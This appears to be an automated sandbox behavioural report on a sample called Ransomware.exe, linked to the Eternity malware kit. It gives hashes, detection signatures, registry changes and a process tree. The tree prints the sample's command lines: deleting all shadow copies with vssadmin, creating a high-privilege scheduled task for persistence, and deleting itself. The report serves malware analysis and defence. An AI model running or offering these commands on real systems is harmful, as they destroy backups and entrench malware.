Analysis
-
max time kernel
150s -
max time network
58s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
10-04-2023 14:29
Behavioral task
behavioral1
Sample
Ransomware.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Ransomware.exe
Resource
win10v2004-20230220-en
General
-
Target
Ransomware.exe
-
Size
112KB
-
MD5
5505bbddc971765df496f907b222c2fb
-
SHA1
de3c8668481fa3dacf2052951d45a9c3a388575d
-
SHA256
a5498ad33354516c8a2affe2de3e3cf515aafb252d5647d0f8c6efe4b46806a4
-
SHA512
7bec3c8dfa0f63db2ae182805dff0602f55b6e419f30b279992d891542f128c121542a05c214d9436f6baeae895cf09027c5d308731682df41d84e6283fd08eb
-
SSDEEP
1536:IsCK9eaNw9AFBPGMPYnQZZZZZZZZZonTZ6PhCOybwXuzIBnwbp3r+hX1dZji:xCSbwmFBPGtTZWhybwX7Bo36TZji
Malware Config
Signatures
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Deletes itself 1 IoCs
pid Process 1324 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 664 Ransomware.exe 1584 Ransomware.exe -
Loads dropped DLL 1 IoCs
pid Process 1324 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1936 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2004 vssadmin.exe 2020 vssadmin.exe -
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.ecrp\shell Ransomware.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.ecrp\shell\open Ransomware.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.ecrp\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\ServiceHub\\Ransomware.exe %1" Ransomware.exe Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.ecrp\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\ServiceHub\\Ransomware.exe %1" Ransomware.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.ecrp Ransomware.exe Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000_CLASSES\.ecrp\shell\open\command Ransomware.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1716 PING.EXE -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeBackupPrivilege 1076 vssvc.exe Token: SeRestorePrivilege 1076 vssvc.exe Token: SeAuditPrivilege 1076 vssvc.exe Token: SeDebugPrivilege 664 Ransomware.exe Token: SeDebugPrivilege 1584 Ransomware.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 824 wrote to memory of 1324 824 Ransomware.exe 29 PID 824 wrote to memory of 1324 824 Ransomware.exe 29 PID 824 wrote to memory of 1324 824 Ransomware.exe 29 PID 824 wrote to memory of 1324 824 Ransomware.exe 29 PID 1324 wrote to memory of 1700 1324 cmd.exe 31 PID 1324 wrote to memory of 1700 1324 cmd.exe 31 PID 1324 wrote to memory of 1700 1324 cmd.exe 31 PID 1324 wrote to memory of 1700 1324 cmd.exe 31 PID 1324 wrote to memory of 1716 1324 cmd.exe 32 PID 1324 wrote to memory of 1716 1324 cmd.exe 32 PID 1324 wrote to memory of 1716 1324 cmd.exe 32 PID 1324 wrote to memory of 1716 1324 cmd.exe 32 PID 1324 wrote to memory of 1936 1324 cmd.exe 33 PID 1324 wrote to memory of 1936 1324 cmd.exe 33 PID 1324 wrote to memory of 1936 1324 cmd.exe 33 PID 1324 wrote to memory of 1936 1324 cmd.exe 33 PID 1324 wrote to memory of 664 1324 cmd.exe 34 PID 1324 wrote to memory of 664 1324 cmd.exe 34 PID 1324 wrote to memory of 664 1324 cmd.exe 34 PID 1324 wrote to memory of 664 1324 cmd.exe 34 PID 664 wrote to memory of 1096 664 Ransomware.exe 38 PID 664 wrote to memory of 1096 664 Ransomware.exe 38 PID 664 wrote to memory of 1096 664 Ransomware.exe 38 PID 664 wrote to memory of 1096 664 Ransomware.exe 38 PID 1096 wrote to memory of 2024 1096 cmd.exe 40 PID 1096 wrote to memory of 2024 1096 cmd.exe 40 PID 1096 wrote to memory of 2024 1096 cmd.exe 40 PID 1096 wrote to memory of 2024 1096 cmd.exe 40 PID 1096 wrote to memory of 2004 1096 cmd.exe 41 PID 1096 wrote to memory of 2004 1096 cmd.exe 41 PID 1096 wrote to memory of 2004 1096 cmd.exe 41 PID 1096 wrote to memory of 2004 1096 cmd.exe 41 PID 112 wrote to memory of 1584 112 taskeng.exe 44 PID 112 wrote to memory of 1584 112 taskeng.exe 44 PID 112 wrote to memory of 1584 112 taskeng.exe 44 PID 112 wrote to memory of 1584 112 taskeng.exe 44 PID 1584 wrote to memory of 1756 1584 Ransomware.exe 47 PID 1584 wrote to memory of 1756 1584 Ransomware.exe 47 PID 1584 wrote to memory of 1756 1584 Ransomware.exe 47 PID 1584 wrote to memory of 1756 1584 Ransomware.exe 47 PID 1756 wrote to memory of 812 1756 cmd.exe 48 PID 1756 wrote to memory of 812 1756 cmd.exe 48 PID 1756 wrote to memory of 812 1756 cmd.exe 48 PID 1756 wrote to memory of 812 1756 cmd.exe 48 PID 1756 wrote to memory of 2020 1756 cmd.exe 49 PID 1756 wrote to memory of 2020 1756 cmd.exe 49 PID 1756 wrote to memory of 2020 1756 cmd.exe 49 PID 1756 wrote to memory of 2020 1756 cmd.exe 49 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ransomware.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Ransomware" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Ransomware.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe"2⤵
- Deletes itself
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\chcp.comchcp 650013⤵PID:1700
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- Runs ping.exe
PID:1716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Ransomware" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:1936
-
-
C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe"C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && vssadmin delete shadows /all /quiet4⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:2024
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2004
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
C:\Windows\system32\taskeng.exetaskeng.exe {F24ABF61-FFDB-4EBD-82D8-0BC5F8B8EEDD} S-1-5-21-3499517378-2376672570-1134980332-1000:MLXLFKOI\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exeC:\Users\Admin\AppData\Local\ServiceHub\Ransomware.exe2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && vssadmin delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:812
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:2020
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD55505bbddc971765df496f907b222c2fb
SHA1de3c8668481fa3dacf2052951d45a9c3a388575d
SHA256a5498ad33354516c8a2affe2de3e3cf515aafb252d5647d0f8c6efe4b46806a4
SHA5127bec3c8dfa0f63db2ae182805dff0602f55b6e419f30b279992d891542f128c121542a05c214d9436f6baeae895cf09027c5d308731682df41d84e6283fd08eb
-
Filesize
112KB
MD55505bbddc971765df496f907b222c2fb
SHA1de3c8668481fa3dacf2052951d45a9c3a388575d
SHA256a5498ad33354516c8a2affe2de3e3cf515aafb252d5647d0f8c6efe4b46806a4
SHA5127bec3c8dfa0f63db2ae182805dff0602f55b6e419f30b279992d891542f128c121542a05c214d9436f6baeae895cf09027c5d308731682df41d84e6283fd08eb
-
Filesize
112KB
MD55505bbddc971765df496f907b222c2fb
SHA1de3c8668481fa3dacf2052951d45a9c3a388575d
SHA256a5498ad33354516c8a2affe2de3e3cf515aafb252d5647d0f8c6efe4b46806a4
SHA5127bec3c8dfa0f63db2ae182805dff0602f55b6e419f30b279992d891542f128c121542a05c214d9436f6baeae895cf09027c5d308731682df41d84e6283fd08eb
-
Filesize
112KB
MD55505bbddc971765df496f907b222c2fb
SHA1de3c8668481fa3dacf2052951d45a9c3a388575d
SHA256a5498ad33354516c8a2affe2de3e3cf515aafb252d5647d0f8c6efe4b46806a4
SHA5127bec3c8dfa0f63db2ae182805dff0602f55b6e419f30b279992d891542f128c121542a05c214d9436f6baeae895cf09027c5d308731682df41d84e6283fd08eb